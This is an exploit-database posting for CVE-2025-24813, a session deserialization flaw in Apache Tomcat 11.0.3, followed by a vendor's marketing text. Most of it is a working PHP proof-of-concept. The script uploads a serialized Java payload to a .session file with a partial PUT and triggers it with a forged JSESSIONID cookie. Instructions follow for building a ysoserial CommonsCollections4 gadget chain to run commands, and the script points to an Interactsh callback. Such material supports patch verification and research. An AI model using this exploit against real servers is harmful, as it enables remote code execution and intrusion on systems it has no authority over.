=============================================================================================================================================
| # Title : Apache Tomcat 11.0.3 Remote Session Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://tomcat.apache.org/ |
=============================================================================================================================================
[+] Summary :
A vulnerability allows attackers to upload a .session file containing a malicious Java serialized payload and then trigger it through a forged JSESSIONID cookie.
[+] References : ( CVE-2025-24813 )
1. Save the file as: poc.php
2. Edit the target:
```php
$target = "http://TARGET";
3.Execute: php poc.php
[+] POC
<?php
/*
CVE-2025-24813 โ PHP Exploit
Author: Indoushka
Packet Storm Security
*/
function rand_filename($length = 6) {
$chars = 'abcdefghijklmnopqrstuvwxyz';
$name = '';
for ($i = 0; $i < $length; $i++) {
$name .= $chars[random_int(0, strlen($chars)-1)];
}
return $name;
}
function generate_payload($interact_url) {
// Java Serialized payload (replace with your custom gadget)
return "\xac\xed\x00\x05\x73\x72\x00\x04\x44\x75\x6d\x6d\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x78\x70";
}
function exploit($target, $interact_url) {
$filename = rand_filename();
$put_url = $target . "/" . $filename . ".session";
$get_url = $target . "/" . $filename;
echo "[+] Exploit for CVE-2025-24813\n";
echo "[+] By Indoushka\n\n";
echo "[+] Uploading payload to: $put_url\n";
$payload = generate_payload($interact_url);
$headers = [
"Content-Range: bytes 0-452/457",
"Content-Type: application/octet-stream"
];
$opts = [
'http' => [
'method' => "PUT",
'header' => implode("\r\n", $headers),
'content' => $payload,
'ignore_errors' => true
]
];
$context = stream_context_create($opts);
$result = @file_get_contents($put_url, false, $context);
preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $m);
$status = $m[1];
if ($status == 201) {
echo "[+] Payload uploaded successfully.\n";
} else {
echo "[-] Upload failed with status: $status\n";
return;
}
echo "[+] Triggering payload via: $get_url\n";
$opts2 = [
'http' => [
'method' => "GET",
'header' => "Cookie: JSESSIONID=.$filename\r\n",
'ignore_errors' => true
]
];
$context2 = stream_context_create($opts2);
@file_get_contents($get_url, false, $context2);
echo "[+] Trigger request sent. Check your Interactsh callback: $interact_url\n";
}
// ====== Interactive Shell ======
echo "[+] Exploit for CVE-2025-24813\n";
echo "[+] Made By Indoushka\n\n";
echo "Target URL: ";
$target = trim(fgets(STDIN));
echo "Interact URL: ";
$interact = trim(fgets(STDIN));
exploit($target, $interact);
?>
------------
Generating a gadgets chain:
Generate a Commons-Collections-4 payload to execute the command: whoami
java -jar ysoserial.jar CommonsCollections4 "whoami" > payload.bin
Convert it to hex or base64 for input into PHP : xxd -p payload.bin
Place it where: return "<hex serialized bytes>";
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation